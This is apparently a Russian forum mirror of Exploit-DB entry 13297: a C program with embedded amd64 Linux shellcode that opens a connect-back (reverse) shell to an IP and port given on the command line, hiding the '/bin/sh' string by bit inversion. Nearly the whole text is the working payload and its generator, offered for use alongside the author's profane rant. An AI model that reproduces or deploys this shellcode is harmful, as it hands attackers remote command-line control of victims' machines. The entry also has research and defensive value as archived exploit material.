- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13297
- Проверка EDB
-
- Пройдено
- Автор
- PHAR
- Тип уязвимости
- SHELLCODE
- Платформа
- GENERATOR
- CVE
- N/A
- Дата публикации
- 2006-04-21
C:
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <limits.h>
/*
usual rant here.. this is just a doodle.. i was curious about
the amd64 and since i dont think a simple exec /bin/sh is worth releasing
i give you, my amd64 connect-back semi-stealth shellcode.. i say semi-stelth
because it contains the bullshit feature that /bin/bash isnt /easily/ noticable
this code uses both 32 and 64 bit instructions, and uses only 64 bit kernel entrypoints
if you might say "but..phar.. linux has 32 bit compatability.. and i can just use existing shellcode"
to that my answer is "fuck you".. i mean.. "there is actually an option to disable 32bit compatability..
i checked.. its there... i promise"
im not entirely sure the C crap below will do what you want.. but the shellcode is good and can be edited
by hand if needed.. (dont forget to invert)
bpp.etherdyne.net
www.stonedcoder.org
phar[at]stonedcoder[dot]org
*/
char sc_raw[] =
"\x48\x31\xd2" // xor %rdx,%rdx
"\x6a\x01" // pushq $0x1
"\x5e" // pop %rsi
"\x6a\x02" // pushq $0x2
"\x5f" // pop %rdi
"\x6a\x29" // pushq $0x29
"\x58" // pop %rax
"\x0f\x05" // syscall #socket
"\x48\x97" // xchg %rax,%rdi #in_sockaddr, rax does equal 2 but i think i can get away with this
"\x50" // push %rax
"\x48\xb9\x00\x00\x00\x00\x11" // mov $0x4141414141414141,%rcx
"\x11\xff\xfd"
"\x48\xf7\xd1" // not %rcx
"\x51" // push %rcx
"\x48\x89\xe6" // mov %rsp,%rsi
"\x6a\x10" // pushq $0x10
"\x5a" // pop %rdx
"\x6a\x2a" // pushq $0x2a
"\x58" // pop %rax
"\x0f\x05" // syscall #connect
"\x6a\x03" // pushq $0x3
"\x5e" // pop %rsi
//dup_loop:
"\x6a\x21" // pushq $0x21
"\x58" // pop %rax
"\x48\xff\xce" // dec %rsi
"\x0f\x05" // syscall #dup2
"\x75\xf6" // jne 4004c5 <dup_loop>
"\x48\xbb\xd0\x9d\x96\x91\xd0" // mov $0xff978cd091969dd0,%rbx
"\x8c\x97\xff"
"\x48\xf7\xd3" // not %rbx
"\x53" // push %rbx
"\x48\x89\xe7" // mov %rsp,%rdi
"\x48\x31\xc0" // xor %rax,%rax
"\x50" // push %rax
"\x57" // push %rdi
"\x48\x89\xe6" // mov %rsp,%rsi
"\x48\x31\xd2" // xor %rdx,%rdx
"\xb0\x3b" // mov $0x3b,%al
"\x0f\x05" // syscall #exec
;
#define HOSTOFFSET 19
#define PORTOFFSET 23
void scprint(char * foo, int len);
void usage();
void (*shellcode)() = sc_raw;
main(int argc, char *argv[]){
uint32 host;
uint16 port;
if(argc != 3){ //i'll only do so much to save you from stupidity
usage();
exit(1);
}
host =~ (int)inet_addr(argv[1]);
port =~ htons(atoi(argv[2]));
memcpy(&sc_raw[HOSTOFFSET],&host,4);
memcpy(&sc_raw[PORTOFFSET],&port,2);
scprint(sc_raw,sizeof(sc_raw));
shellcode();
}
void scprint(char * foo, int len){
int i;
printf("char shellcode[]=\"");
for(i = 0; i < len; i++){
printf("\\x%02x",(char)foo[i]&0xff);
}
printf("\";\n");
fflush(stdout);
}
void usage(){
printf("./%s [<ip address.. and i mean ip address>] [<port number>]\n\n");
}
// milw0rm.com [2006-04-21]- Источник
- www.exploit-db.com
